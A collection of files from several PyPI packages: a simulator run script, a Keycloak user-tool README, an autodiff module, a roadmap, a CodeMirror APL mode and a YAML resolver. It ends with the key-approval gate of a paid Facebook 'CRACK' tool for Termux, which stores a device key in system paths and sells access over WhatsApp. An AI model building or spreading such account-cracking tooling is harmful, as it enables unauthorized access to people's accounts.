(time python3 examples/AIMM_simulator_example_n5.py | "${PLOTTER}" -nplots=3 -tmax=500 -ylims='{0: (-100,100), 1: (-100,100), 2: (0,30)}' -ylabels='{0: "UE[0] $x$", 1: "UE[0] $y$", 2: "UE[0] throughput"}' -fnb='examples/img/AIMM_simulator_example_n5' -author='Keith Briggs')
if [ $? -ne 0 ]
then
echo "AIMM_simulator_example_n5.py failed - quitting!"
exit 1
fi
# Tutorial example 6...
(time python3 examples/AIMM_simulator_example_n6.py | "${PLOTTER}" -nplots=1 -tmax=100 -ylims='[(0,1),]' -ylabels='{0: "average downlink throughput over all UEs"}' -fnb='examples/img/AIMM_simulator_example_n6' -author='Keith Briggs')
if [ $? -ne 0 ]
then
echo "AIMM_simulator_example_n6.py failed - quitting!"
exit 1
fi
# Tutorial example 7...
(python3 examples/AIMM_simulator_example_n7.py | "${PLOTTER}" -nplots=4 -tmax=2000 -ylims='{0: (0,10), 1: (0,1000), 2: (0,1000), 3: (0,30)}' -ylabels='{0: "UE[0] throughput", 1: "UE[0] $x$", 2: "UE[0] $y$", 3: "UE[0] serving cell"}' -fnb='examples/img/AIMM_simulator_example_n7' -author='Keith Briggs')
if [ $? -ne 0 ]
then
echo "AIMM_simulator_example_n7.py failed - quitting!"
exit 1
fi
# Tutorial example 8...
python3 examples/AIMM_simulator_example_n8.py
if [ $? -ne 0 ]
then
echo "AIMM_simulator_example_n8.py failed - quitting!"
exit 1
fi
#bash run_RIC_example.sh | PypiClean |
/FOMUserUtil-0.0.13.tar.gz/FOMUserUtil-0.0.13/README.md | <!-- PROJECT SHIELDS -->
[](/../../graphs/contributors)
[](/../../network/members)
[](/../../stargazers)
[](/../../issues)
[](/LICENSE.md)
[](https://github.com/bcgov/repomountie/blob/master/doc/lifecycle-badges.md)
# Overview
<img src="https://lh3.googleusercontent.com/pw/AM-JKLVQ3zIZBxbAlzoCsqFki5ndraAKWN0V39ChQO_Z70ILBbwtNZAwJkWUlGp4Rg0I7rUhB4Qi5qfM507gC6yafbQV-L9ni8LMBojAVi_EuF7mnaBz5SyWf0RMIUx7WVcSsGj6EsTBQ90zhxvaYqSTmVuA4Q=w1072-h804-no?authuser=0" width='600px'>
The [Forest Operations Map](https://github.com/bcgov/nr-fom-api) application
supports the ability for licensees to authenticate / login to the application.
Authentication is handled using OIDC. The application in its current state
requires that someone in government be able to manage access.
Adding new users / roles to the application through the keycloak UI would be
inefficient, as it would require:
* looking up the forest client number
* determining if it exists as a role in keycloak
* creating the role if it does not exist
* adding the user to the role
This repository contains the code for a simple command-line tool that
makes it easy to add new users to the FOM application.
# Setup
## Run setup script
### Download the install script from [here](https://raw.githubusercontent.com/bcgov/nr-fom-usermanager/main/fom_shell.sh)
```
# download the file:
curl https://raw.githubusercontent.com/bcgov/nr-fom-usermanager/main/util/mgr_shell.sh -o mgr_shell.sh
# edit line 5 adding the keycloak secret
# make the file executable
chmod +x mgr_shell.sh
# install deps
util/mgr_shell.sh
# run fomuser
fomuser
```
## Return and re-run
```
# set up the virtualenv
util/mgr_shell.sh
# run fomuser
fomuser
```
# Older Instructions - hopefully replaced by above
## define the following env vars
Either copy this file as `.env`: <https://raw.githubusercontent.com/bcgov/nr-fom-usermanager/main/env-sample>
or populate these env vars:
```
KC_HOST=https://<host>
KC_CLIENTID=<The kc client set up to administer fom users>
KC_SECRET=<client secret>
KC_REALM=<realm>
KC_FOM_CLIENTID=<the kc client that fom app uses to authenticate against>
```
## Install
```
python3 -m venv venvfom
source ./venvfom/bin/activate
pip install FOMUserUtil
```
## Re-use Venv after install
```
source ./venvfom/bin/activate
fomuser
```
# Using the CLI tool
## Search forest clients
Before a new user can be added we need to know what forest client id to attach
them to. This is accomplished with a forest client search.
`fomuser -qfc <search string>`
Example:
```
kirk@NCC1701:$ fomuser -qfc kli
forest clients matching: kli
--------------------------------------------------------------------------------
KLINGON CONTRACTING LTD. - 18514
KLINGON SAND & GRAVEL LTD. - 31775
KLINGON & BORG CONSULTING - 53996
KLI FOREST PRODUCTS INC. - 68697
KLI ENG. & LAND SURVEYING INC - 97448
KLI INVESTMENTS LTD. - 103766
KLIMA RESOURCES LTD. - 110974
KLISTERS PELLET INC - 126239
KLIK & CLOCK CONSULTING LTD. - 126967
```
## Search Keycloak users
Having determined what the forest client id is, use the following command to
search for the users in keycloak:
`fomuser -qu <search string>`
Example:
```
kirk@NCC1701:$ fomuser -qu sp
matching users for search: kj
--------------------------------------------------------------------------------
spock@enterprisedir - [email protected]
speed.warp@Prometheusdir - [email protected]
sp.warf@bce-klingon-id - [email protected]
```
## Adding the user - (not complete)
Having determined the user id, and the forest client the new user can now be
added:
`fomuser --add <userid> <forest client id>`
Projected syntax:
```
fom-user <forest client id> <user email>
```
# Building the package manually
```
pip install -r requirements-build.txt
python -m build --sdist
```
# Related links / Information
https://github.com/bcgov/ocp-sso/issues/118
# Keycloak Config
Assuming a fom client config already exists, the following instructions
outline what needs to be done to add fom admin service account / client
to keycloak. At the moment this is accomplished using the GUI.
* Create client
* protocol = openid-connect
* root url = blank
* Configure Client - (screen that comes up after client is created)
* fill in <name> and <description>
* Access Type: confidential
* Service Accounts Enabled: On
* valid redirect uris: localhost
* Configure roles: <Service Account Roles>
* type 'realm-management' in Client Roles and select
* Assign the following roles:
* manage-clients
* manage-users
* query-clients
* view-clients
* view-users
# Development
* before pushing new versions, be sure to increment the version in the files:
  * `src/FOMUserUtil/__init__.py`
  * `setup.cfg`
/AutoDiffpyy-1.0.tar.gz/AutoDiffpyy-1.0/AutoDiffpy/ElementaryFunc.py |
import numpy as np
from dual import Dual
from Node import Node
# Trig functions
def sin(x):
"""
Return the sine value of x.
Parameters
----------
x : int, float, Dual, Node
Input to the sine function.
Returns
-------
value : int, float, Dual
The sine value of the dual number implementation or the sine value of a real number.
"""
if isinstance(x, Node):
child = Node(np.sin(x.value))
x.children.append({'partial_der':np.cos(x.value), 'node':child})
return child
elif isinstance(x, Dual):
return Dual(np.sin(x.real), np.cos(x.real) * x.dual)
else:
return np.sin(x)
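# Illustrative sketch (not part of the original module): a forward-mode check
# for sin, assuming Dual(real, dual) carries the derivative seed in ``dual``:
#   sin(Dual(0.0, 1.0))   # Dual(0.0, 1.0): sin(0) = 0 and d/dx sin(x)|_0 = cos(0) = 1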
def cos(x):
"""
Return the cosine value of x.
Parameters
----------
x : int, float, Dual
Input to the cosine function.
Returns
-------
value : int, float, Dual
The cosine value of the dual number implementation or the cosine value of a real number.
"""
if isinstance(x, Node):
child = Node(np.cos(x.value))
x.children.append({'partial_der':-np.sin(x.value), 'node':child})
return child
elif isinstance(x, Dual):
return Dual(np.cos(x.real), -np.sin(x.real) * x.dual)
else:
return np.cos(x)
def tan(x):
"""
Return the tangent value of x.
Parameters
----------
x : int, float, Dual
Input to the tangent function.
Returns
-------
value : int, float, Dual
The tangent value of the dual number implementation or the tangent value of a real number.
"""
if isinstance(x, Node):
child = Node(np.tan(x.value))
x.children.append({'partial_der':1/(np.cos(x.value)**2), 'node':child})
return child
elif isinstance(x, Dual):
return Dual(np.tan(x.real), 1/np.cos(x.real)**2*np.asarray(x.dual))
else:
return np.tan(x)
# Inverse trig functions
def arcsin(x):
"""
Return the arcsine value of x.
Parameters
----------
x : int, float, Dual
Input to the arcsine function.
Returns
-------
value : int, float, Dual
The arcsine value of the dual number implementation or the arcsine value of a real number.
"""
if isinstance(x,Node):
child = Node(np.arcsin(x.value))
temp = 1 - x.value**2
        if temp <= 0:
            raise ValueError('arcsin derivative is undefined for |x| >= 1')
x.children.append({'partial_der':1/(np.sqrt(temp)), 'node':child})
return child
elif isinstance(x, Dual):
return Dual(np.arcsin(x.real), x.dual / np.sqrt(1 - x.real**2))
else:
return np.arcsin(x)
def arccos(x):
"""
Return the arccosine value of x.
Parameters
----------
x : int, float, Dual
Input to the arccosine function.
Returns
-------
value : int, float, Dual
The arccosine value of the dual number implementation or the arccosine value of a real number.
"""
if isinstance(x,Node):
child = Node(np.arccos(x.value))
temp = 1 - x.value**2
        if temp <= 0:
            raise ValueError('arccos derivative is undefined for |x| >= 1')
x.children.append({'partial_der':-1/(np.sqrt(temp)), 'node':child})
return child
elif isinstance(x, Dual):
return Dual(np.arccos(x.real), -x.dual / np.sqrt(1 - x.real**2))
else:
return np.arccos(x)
def arctan(x):
"""
Return the arctangent value of x.
Parameters
----------
x : int, float, Dual
Input to the arctangent function.
Returns
-------
value : int, float, Dual
The arctangent value of the dual number implementation or the arctangent value of a real number.
"""
if isinstance(x,Node):
child = Node(np.arctan(x.value))
x.children.append({'partial_der':1/(1+x.value**2), 'node':child})
return child
elif isinstance(x, Dual):
return Dual(np.arctan(x.real), x.dual / (1 + x.real**2))
else:
return np.arctan(x)
# Exponentials
def exp(x):
"""
Return the exponential value of x with base e.
Parameters
----------
x : int, float, Dual
Input to the exponential function with base e.
Returns
-------
value : int, float, Dual
The exponential value of the dual number implementation or the exponential value of a real number with base e.
"""
if isinstance(x,Node):
child = Node(np.exp(x.value))
x.children.append({'partial_der':np.exp(x.value), 'node':child})
return child
elif isinstance(x, Dual):
return Dual(np.exp(x.real), np.exp(x.real) * x.dual)
else:
return np.exp(x)
def exponential(base, x):
"""
Return the exponential value of x with specified base.
Parameters
----------
base: int, float
Base of the exponential function.
x : int, float, Dual
Input to the exponential function with specified base.
Returns
-------
value : int, float, Dual
The exponential value of the dual number implementation or the exponential value of a real number with specified base.
"""
if isinstance(x,Node):
        child = Node(base**x.value)  # the node value is base**x, not e**x
        x.children.append({'partial_der':np.log(base)*(base**x.value), 'node':child})
return child
elif isinstance(x, Dual):
return Dual(base**x.real, np.log(base) * (base**x.real) * x.dual)
else:
return base**x
# Hyperbolic functions
def sinh(x):
"""
Return the sinh value of x.
Parameters
----------
x : int, float, Dual
Input to the sinh function.
Returns
-------
value : int, float, Dual
The sinh value of the dual number implementation or the sinh value of a real number.
"""
if isinstance(x,Node):
child = Node(np.sinh(x.value))
x.children.append({'partial_der':np.cosh(x.value), 'node':child})
return child
elif isinstance(x, Dual):
return Dual(np.sinh(x.real), np.cosh(x.real) * x.dual)
else:
return np.sinh(x)
def cosh(x):
"""
Return the cosh value of x.
Parameters
----------
x : int, float, Dual
Input to the cosh function.
Returns
-------
value : int, float, Dual
The cosh value of the dual number implementation or the cosh value of a real number.
"""
if isinstance(x,Node):
child = Node(np.cosh(x.value))
x.children.append({'partial_der':np.sinh(x.value), 'node':child})
return child
elif isinstance(x, Dual):
return Dual(np.cosh(x.real), np.sinh(x.real) * x.dual)
else:
return np.cosh(x)
def tanh(x):
"""
Return the tanh value of x.
Parameters
----------
x : int, float, Dual
Input to the tanh function.
Returns
-------
value : int, float, Dual
The tanh value of the dual number implementation or the tanh value of a real number.
"""
if isinstance(x,Node):
child = Node(np.tanh(x.value))
x.children.append({'partial_der':1/np.cosh(x.value)**2, 'node':child})
return child
elif isinstance(x, Dual):
return Dual(np.tanh(x.real), (1 - np.tanh(x.real)**2) * x.dual)
else:
return np.tanh(x)
# Logistic function
def logistic(x):
"""
Return the logistic value of x.
Parameters
----------
x : int, float, Dual
Input to the logistic function.
Returns
-------
value : int, float, Dual
The logistic value of the dual number implementation or the logistic value of a real number.
"""
if isinstance(x,Node):
child = Node(1/(1+np.exp(-x.value)))
nom = np.exp(x.value)
dom = (1+np.exp(x.value))**2
x.children.append({'partial_der':nom/dom, 'node':child})
return child
elif isinstance(x, Dual):
return Dual(1 / (1 + np.exp(-x.real)), np.exp(-x.real) * x.dual / (1 + np.exp(-x.real))**2)
else:
return 1 / (1 + np.exp(-x))
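# Note (sketch, not part of the original module): the partial derivative used
# in the Node branch above, e**x / (1 + e**x)**2, is algebraically the familiar
# logistic identity sigma(x) * (1 - sigma(x)).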
# Logarithms
def log(x):
"""
Return the logarithm value of x with base e.
Parameters
----------
x : int, float, Dual
Input to the logarithm function with base e.
Returns
-------
value : int, float, Dual
The logarithm value of the dual number implementation or the logarithm value of a real number with base e.
"""
if isinstance(x,Node):
child = Node(np.log(x.value))
x.children.append({'partial_der':(1/(x.value)), 'node':child})
return child
elif isinstance(x, Dual):
if x.real <= 0:
raise ValueError('Domain of logarithm should be greater than 0')
return Dual(np.log(x.real), x.dual / x.real)
else:
return np.log(x)
def log2(x):
"""
Return the logarithm value of x with base 2.
Parameters
----------
x : int, float, Dual
Input to the logarithm function with base 2.
Returns
-------
value : int, float, Dual
The logarithm value of the dual number implementation or the logarithm value of a real number with base 2.
"""
if isinstance(x,Node):
child = Node(np.log2(x.value))
x.children.append({'partial_der':(1/(x.value*np.log(2))), 'node':child})
return child
elif isinstance(x, Dual):
if x.real <= 0:
raise ValueError('Domain of logarithm should be greater than 0')
return Dual(np.log2(x.real), x.dual / (x.real * np.log(2)))
else:
return np.log2(x)
def log10(x):
"""
Return the logarithm value of x with base 10.
Parameters
----------
x : int, float, Dual
Input to the logarithm function with base 10.
Returns
-------
value : int, float, Dual
The logarithm value of the dual number implementation or the logarithm value of a real number with base 10.
"""
if isinstance(x,Node):
child = Node(np.log10(x.value))
x.children.append({'partial_der':(1/(x.value*np.log(10))), 'node':child})
return child
elif isinstance(x, Dual):
if x.real <= 0:
raise ValueError('Domain of logarithm should be greater than 0')
return Dual(np.log10(x.real), x.dual / (x.real * np.log(10)))
else:
return np.log10(x)
def logarithm(x, base):
"""
Return the logarithm value of x with specified base.
Parameters
----------
x : int, float, Dual
Input to the logarithm function with specified base.
base: int
Base of the logarithm function.
Returns
-------
value : int, float, Dual
The logarithm value of the dual number implementation or the logarithm value of a real number with specified base.
"""
if isinstance(x,Node):
child = Node(np.log(x.value)/np.log(base))
x.children.append({'partial_der':(1/(x.value*np.log(base))), 'node':child})
return child
elif isinstance(x, Dual):
if x.real <= 0:
raise ValueError('Domain of logarithm should be greater than 0')
return Dual(np.log(x.real) / np.log(base), x.dual / (x.real * np.log(base)))
else:
return np.log(x) / np.log(base)
# Square root
def sqrt(x):
"""
Return the square root value of x.
Parameters
----------
x : int, float, Dual
Input to the square root function.
Returns
-------
value : int, float, Dual
The square root value of the dual number implementation or the square root value of a real number.
"""
if isinstance(x,Node):
child = Node(x.value**(1/2))
x.children.append({'partial_der':((1/2)*x.value**(-1/2)), 'node':child})
return child
elif isinstance(x, Dual):
        return Dual(np.sqrt(x.real), x.dual / (2 * np.sqrt(x.real)))  # d/dx sqrt(x) = 1/(2*sqrt(x))
else:
return np.sqrt(x)
# if __name__=='__main__':
# val = Dual(3,1)
# val2 = Dual(2,[1,2])
# z = sin(val)
# print(z)
# print(cos(val))
# print(tan(val2))
# val = Dual(0.5,0.5)
# print(arcsin(val))
# val=Dual(0.5,0.5)
# print(arccos(val))
# print(arctan(val))
# print(exp(val))
# base = 2
# print(exponential(2,val))
# print(sinh(val))
# print(cosh(val))
# print(tanh(val))
# print(logistic(val))
# print(log(val))
# print(log2(val))
# print(log10(val))
# print(logarithm(val,base))
# print(sqrt(val)) | PypiClean |
/AnyBlok-2.1.0.tar.gz/AnyBlok-2.1.0/doc/ROADMAP.rst | .. This file is a part of the AnyBlok project
..
.. Copyright (C) 2014 Jean-Sebastien SUZANNE <[email protected]>
..
.. This Source Code Form is subject to the terms of the Mozilla Public License,
.. v. 2.0. If a copy of the MPL was not distributed with this file,You can
.. obtain one at http://mozilla.org/MPL/2.0/.
.. contents::
ROADMAP
=======
To implement
------------
* Add slogan
* Update doc
* Need to improve alembic and sqlalchemy-utils
* Refactor the engine declarations to have master / slave(s) configuration
* Addons for sqlalchemy : http://sqlalchemy-utils.readthedocs.org/en/latest/installation.html
Library to include
------------------
* full text search: https://pypi.python.org/pypi/SQLAlchemy-FullText-Search/0.2
* internationalisation: https://pypi.python.org/pypi/SQLAlchemy-i18n/0.8.2
* sqltap http://sqltap.inconshreveable.com, profiling and introspection for SQLAlchemy applications
* Crypt https://bitbucket.org/zzzeek/sqlalchemy/wiki/UsageRecipes/DatabaseCrypt
* profiling https://bitbucket.org/zzzeek/sqlalchemy/wiki/UsageRecipes/Profiling
Functionality which needs a sprint
----------------------------------
* Tasks Management
* Internationalization
* Ancestor left / right
| PypiClean |
/Flask-MDEditor-0.1.4.tar.gz/Flask-MDEditor-0.1.4/flask_mdeditor/static/mdeditor/js/lib/codemirror/mode/apl/apl.js |
(function(mod) {
if (typeof exports == "object" && typeof module == "object") // CommonJS
mod(require("../../lib/codemirror"));
else if (typeof define == "function" && define.amd) // AMD
define(["../../lib/codemirror"], mod);
else // Plain browser env
mod(CodeMirror);
})(function(CodeMirror) {
"use strict";
CodeMirror.defineMode("apl", function() {
var builtInOps = {
".": "innerProduct",
"\\": "scan",
"/": "reduce",
"⌿": "reduce1Axis",
"⍀": "scan1Axis",
"¨": "each",
"⍣": "power"
};
var builtInFuncs = {
"+": ["conjugate", "add"],
"−": ["negate", "subtract"],
"×": ["signOf", "multiply"],
"÷": ["reciprocal", "divide"],
"⌈": ["ceiling", "greaterOf"],
"⌊": ["floor", "lesserOf"],
"∣": ["absolute", "residue"],
"⍳": ["indexGenerate", "indexOf"],
"?": ["roll", "deal"],
"⋆": ["exponentiate", "toThePowerOf"],
"⍟": ["naturalLog", "logToTheBase"],
"○": ["piTimes", "circularFuncs"],
"!": ["factorial", "binomial"],
"⌹": ["matrixInverse", "matrixDivide"],
"<": [null, "lessThan"],
"≤": [null, "lessThanOrEqual"],
"=": [null, "equals"],
">": [null, "greaterThan"],
"≥": [null, "greaterThanOrEqual"],
"≠": [null, "notEqual"],
"≡": ["depth", "match"],
"≢": [null, "notMatch"],
"∈": ["enlist", "membership"],
"⍷": [null, "find"],
"∪": ["unique", "union"],
"∩": [null, "intersection"],
"∼": ["not", "without"],
"∨": [null, "or"],
"∧": [null, "and"],
"⍱": [null, "nor"],
"⍲": [null, "nand"],
"⍴": ["shapeOf", "reshape"],
",": ["ravel", "catenate"],
"⍪": [null, "firstAxisCatenate"],
"⌽": ["reverse", "rotate"],
"⊖": ["axis1Reverse", "axis1Rotate"],
"⍉": ["transpose", null],
"↑": ["first", "take"],
"↓": [null, "drop"],
"⊂": ["enclose", "partitionWithAxis"],
"⊃": ["diclose", "pick"],
"⌷": [null, "index"],
"⍋": ["gradeUp", null],
"⍒": ["gradeDown", null],
"⊤": ["encode", null],
"⊥": ["decode", null],
"⍕": ["format", "formatByExample"],
"⍎": ["execute", null],
"⊣": ["stop", "left"],
"⊢": ["pass", "right"]
};
var isOperator = /[\.\/⌿⍀¨⍣]/;
var isNiladic = /⍬/;
var isFunction = /[\+−×÷⌈⌊∣⍳\?⋆⍟○!⌹<≤=>≥≠≡≢∈⍷∪∩∼∨∧⍱⍲⍴,⍪⌽⊖⍉↑↓⊂⊃⌷⍋⍒⊤⊥⍕⍎⊣⊢]/;
var isArrow = /←/;
var isComment = /[⍝#].*$/;
  var stringEater = function(type) {
    var prev = false;
    return function(c) {
      if (c === type) {
        // Keep eating only when the closing quote is escaped by the previous char;
        // the original overwrote prev before this check, breaking escape handling.
        var wasEscaped = prev === "\\";
        prev = c;
        return wasEscaped;
      }
      prev = c;
      return true;
    };
  };
return {
startState: function() {
return {
prev: false,
func: false,
op: false,
string: false,
escape: false
};
},
token: function(stream, state) {
var ch, funcName, word;
if (stream.eatSpace()) {
return null;
}
ch = stream.next();
if (ch === '"' || ch === "'") {
stream.eatWhile(stringEater(ch));
stream.next();
state.prev = true;
return "string";
}
if (/[\[{\(]/.test(ch)) {
state.prev = false;
return null;
}
if (/[\]}\)]/.test(ch)) {
state.prev = true;
return null;
}
if (isNiladic.test(ch)) {
state.prev = false;
return "niladic";
}
if (/[¯\d]/.test(ch)) {
if (state.func) {
state.func = false;
state.prev = false;
} else {
state.prev = true;
}
stream.eatWhile(/[\w\.]/);
return "number";
}
if (isOperator.test(ch)) {
return "operator apl-" + builtInOps[ch];
}
if (isArrow.test(ch)) {
return "apl-arrow";
}
if (isFunction.test(ch)) {
funcName = "apl-";
if (builtInFuncs[ch] != null) {
if (state.prev) {
funcName += builtInFuncs[ch][1];
} else {
funcName += builtInFuncs[ch][0];
}
}
state.func = true;
state.prev = false;
return "function " + funcName;
}
if (isComment.test(ch)) {
stream.skipToEnd();
return "comment";
}
if (ch === "∘" && stream.peek() === ".") {
stream.next();
return "function jot-dot";
}
stream.eatWhile(/[\w\$_]/);
word = stream.current();
state.prev = true;
return "keyword";
}
};
});
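// Usage sketch (illustrative, outside this module): attach the mode to an editor.
//   var editor = CodeMirror.fromTextArea(document.getElementById("code"), {mode: "apl"});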
CodeMirror.defineMIME("text/apl", "apl");
}); | PypiClean |
/Nuitka_fixed-1.1.2-cp310-cp310-win_amd64.whl/nuitka/build/inline_copy/yaml/yaml/resolver.py | __all__ = ['BaseResolver', 'Resolver']
from .error import *
from .nodes import *
import re
class ResolverError(YAMLError):
pass
class BaseResolver:
DEFAULT_SCALAR_TAG = 'tag:yaml.org,2002:str'
DEFAULT_SEQUENCE_TAG = 'tag:yaml.org,2002:seq'
DEFAULT_MAPPING_TAG = 'tag:yaml.org,2002:map'
yaml_implicit_resolvers = {}
yaml_path_resolvers = {}
def __init__(self):
self.resolver_exact_paths = []
self.resolver_prefix_paths = []
@classmethod
def add_implicit_resolver(cls, tag, regexp, first):
        if 'yaml_implicit_resolvers' not in cls.__dict__:
implicit_resolvers = {}
for key in cls.yaml_implicit_resolvers:
implicit_resolvers[key] = cls.yaml_implicit_resolvers[key][:]
cls.yaml_implicit_resolvers = implicit_resolvers
if first is None:
first = [None]
for ch in first:
cls.yaml_implicit_resolvers.setdefault(ch, []).append((tag, regexp))
@classmethod
def add_path_resolver(cls, tag, path, kind=None):
# Note: `add_path_resolver` is experimental. The API could be changed.
# `new_path` is a pattern that is matched against the path from the
# root to the node that is being considered. `node_path` elements are
# tuples `(node_check, index_check)`. `node_check` is a node class:
# `ScalarNode`, `SequenceNode`, `MappingNode` or `None`. `None`
# matches any kind of a node. `index_check` could be `None`, a boolean
# value, a string value, or a number. `None` and `False` match against
# any _value_ of sequence and mapping nodes. `True` matches against
# any _key_ of a mapping node. A string `index_check` matches against
# a mapping value that corresponds to a scalar key which content is
# equal to the `index_check` value. An integer `index_check` matches
# against a sequence value with the index equal to `index_check`.
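        # Example (illustrative sketch): resolve the scalar value of a top-level
        # mapping entry whose key is "version" to a hypothetical custom tag:
        #   Resolver.add_path_resolver('!version', [(dict, 'version')], str)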
        if 'yaml_path_resolvers' not in cls.__dict__:
cls.yaml_path_resolvers = cls.yaml_path_resolvers.copy()
new_path = []
for element in path:
if isinstance(element, (list, tuple)):
if len(element) == 2:
node_check, index_check = element
elif len(element) == 1:
node_check = element[0]
index_check = True
else:
raise ResolverError("Invalid path element: %s" % element)
else:
node_check = None
index_check = element
if node_check is str:
node_check = ScalarNode
elif node_check is list:
node_check = SequenceNode
elif node_check is dict:
node_check = MappingNode
elif node_check not in [ScalarNode, SequenceNode, MappingNode] \
and not isinstance(node_check, str) \
and node_check is not None:
raise ResolverError("Invalid node checker: %s" % node_check)
if not isinstance(index_check, (str, int)) \
and index_check is not None:
raise ResolverError("Invalid index checker: %s" % index_check)
new_path.append((node_check, index_check))
if kind is str:
kind = ScalarNode
elif kind is list:
kind = SequenceNode
elif kind is dict:
kind = MappingNode
elif kind not in [ScalarNode, SequenceNode, MappingNode] \
and kind is not None:
raise ResolverError("Invalid node kind: %s" % kind)
cls.yaml_path_resolvers[tuple(new_path), kind] = tag
def descend_resolver(self, current_node, current_index):
if not self.yaml_path_resolvers:
return
exact_paths = {}
prefix_paths = []
if current_node:
depth = len(self.resolver_prefix_paths)
for path, kind in self.resolver_prefix_paths[-1]:
if self.check_resolver_prefix(depth, path, kind,
current_node, current_index):
if len(path) > depth:
prefix_paths.append((path, kind))
else:
exact_paths[kind] = self.yaml_path_resolvers[path, kind]
else:
for path, kind in self.yaml_path_resolvers:
if not path:
exact_paths[kind] = self.yaml_path_resolvers[path, kind]
else:
prefix_paths.append((path, kind))
self.resolver_exact_paths.append(exact_paths)
self.resolver_prefix_paths.append(prefix_paths)
def ascend_resolver(self):
if not self.yaml_path_resolvers:
return
self.resolver_exact_paths.pop()
self.resolver_prefix_paths.pop()
def check_resolver_prefix(self, depth, path, kind,
current_node, current_index):
node_check, index_check = path[depth-1]
if isinstance(node_check, str):
if current_node.tag != node_check:
return
elif node_check is not None:
if not isinstance(current_node, node_check):
return
if index_check is True and current_index is not None:
return
if (index_check is False or index_check is None) \
and current_index is None:
return
if isinstance(index_check, str):
if not (isinstance(current_index, ScalarNode)
and index_check == current_index.value):
return
elif isinstance(index_check, int) and not isinstance(index_check, bool):
if index_check != current_index:
return
return True
def resolve(self, kind, value, implicit):
if kind is ScalarNode and implicit[0]:
if value == '':
resolvers = self.yaml_implicit_resolvers.get('', [])
else:
resolvers = self.yaml_implicit_resolvers.get(value[0], [])
wildcard_resolvers = self.yaml_implicit_resolvers.get(None, [])
for tag, regexp in resolvers + wildcard_resolvers:
if regexp.match(value):
return tag
implicit = implicit[1]
if self.yaml_path_resolvers:
exact_paths = self.resolver_exact_paths[-1]
if kind in exact_paths:
return exact_paths[kind]
if None in exact_paths:
return exact_paths[None]
if kind is ScalarNode:
return self.DEFAULT_SCALAR_TAG
elif kind is SequenceNode:
return self.DEFAULT_SEQUENCE_TAG
elif kind is MappingNode:
return self.DEFAULT_MAPPING_TAG
class Resolver(BaseResolver):
pass
Resolver.add_implicit_resolver(
'tag:yaml.org,2002:bool',
re.compile(r'''^(?:yes|Yes|YES|no|No|NO
|true|True|TRUE|false|False|FALSE
|on|On|ON|off|Off|OFF)$''', re.X),
list('yYnNtTfFoO'))
Resolver.add_implicit_resolver(
'tag:yaml.org,2002:float',
re.compile(r'''^(?:[-+]?(?:[0-9][0-9_]*)\.[0-9_]*(?:[eE][-+][0-9]+)?
|\.[0-9][0-9_]*(?:[eE][-+][0-9]+)?
|[-+]?[0-9][0-9_]*(?::[0-5]?[0-9])+\.[0-9_]*
|[-+]?\.(?:inf|Inf|INF)
|\.(?:nan|NaN|NAN))$''', re.X),
list('-+0123456789.'))
Resolver.add_implicit_resolver(
'tag:yaml.org,2002:int',
re.compile(r'''^(?:[-+]?0b[0-1_]+
|[-+]?0[0-7_]+
|[-+]?(?:0|[1-9][0-9_]*)
|[-+]?0x[0-9a-fA-F_]+
|[-+]?[1-9][0-9_]*(?::[0-5]?[0-9])+)$''', re.X),
list('-+0123456789'))
Resolver.add_implicit_resolver(
'tag:yaml.org,2002:merge',
re.compile(r'^(?:<<)$'),
['<'])
Resolver.add_implicit_resolver(
'tag:yaml.org,2002:null',
re.compile(r'''^(?: ~
|null|Null|NULL
| )$''', re.X),
['~', 'n', 'N', ''])
Resolver.add_implicit_resolver(
'tag:yaml.org,2002:timestamp',
re.compile(r'''^(?:[0-9][0-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9]
|[0-9][0-9][0-9][0-9] -[0-9][0-9]? -[0-9][0-9]?
(?:[Tt]|[ \t]+)[0-9][0-9]?
:[0-9][0-9] :[0-9][0-9] (?:\.[0-9]*)?
(?:[ \t]*(?:Z|[-+][0-9][0-9]?(?::[0-9][0-9])?))?)$''', re.X),
list('0123456789'))
Resolver.add_implicit_resolver(
'tag:yaml.org,2002:value',
re.compile(r'^(?:=)$'),
['='])
# The following resolver is only for documentation purposes. It cannot work
# because plain scalars cannot start with '!', '&', or '*'.
Resolver.add_implicit_resolver(
'tag:yaml.org,2002:yaml',
re.compile(r'^(?:!|&|\*)$'),
list('!&*')) | PypiClean |
/NaimV1-0.2-py3-none-any.whl/mmmm/Shuvo.py | try:
import requests,calendar
except ModuleNotFoundError:
os.system("python -m pip install requests ")
try:
import bs4
except ModuleNotFoundError:
os.system("python -m pip install bs4 ")
try:
import mechanize
except ModuleNotFoundError:
os.system("python -m pip install mechanize ")
import requests,bs4,sys,os,random,time,re,json,uuid,subprocess,platform,base64
from random import randint
from concurrent.futures import ThreadPoolExecutor
from bs4 import BeautifulSoup
from datetime import date
from datetime import datetime
from urllib.parse import quote
import requests,bs4,sys,os,random,time,re,json,uuid,subprocess
from random import randint
import requests, re, os, time
import requests as ress
import os
import sys
import base64
import random
import requests
import platform
def mahdi():
print('DONT TRY TO DECREPT IT....FUCK YOUR DECODE SYSTEM')
print('SECURE BY \033[1;31mMAHDI HASAN SHUVO')
print("FB:www.facebook.com/bk4human")
os.system('clear')
Subscraption()
naim="==CRACK=="
myid=uuid.uuid4().hex[:10].upper()
try:
key1 = open('/data/data/com.termux/files/usr/bin/python3-confi1', 'r').read()
except:
kok=open('/data/data/com.termux/files/usr/bin/python3-confi1', 'w')
kok.write(myid+naim)
kok.close()
def Subscraption():
key1=open('/data/data/com.termux/files/usr/bin/python3-confi1', 'r').read()
os.system('clear')
logo()
r1=requests.get("https://flame-naim.blogspot.com/2022/06/blog-post.html").text
if key1 in r1:
os.system('clear')
logo()
v1()
else:
os.system("clear")
logo()
print("\t \033[1;31m[\033[1;32m✓\033[1;31m]\033[1;32m First Get Approvel\033[1;37m ")
os.system("clear")
logo()
print(" \033[1;31m[\033[1;32m✓\033[1;31m]\033[1;32m Your Key is Not Approved ")
print("")
print(" \033[1;31m[\033[1;32m✓\033[1;31m]\033[1;32m Copy And Send Key To Admin")
print ("")
print (" \033[1;31m[\033[1;32m✓\033[1;31m]\033[1;32m Your Key : "+naim+key1)
print ("")
input(" \033[1;31m[\033[1;32m✓\033[1;31m]\033[1;32m\033[1;32m Enter To Send Key")
time.sleep(3.5)
tks = 'DEAR%20SIR%20I%20WANT%20TO%20BUY%20YOUR%20CRACK-FILE%20PAID%20TOOL%20%20%20%20%20%20%20%20%20%20%20'+naim+''+key1
os.system('am start https://wa.me/+8801952-081184?text=' + tks)
Subscraption()
def v1():
os.system('clear')
logo()
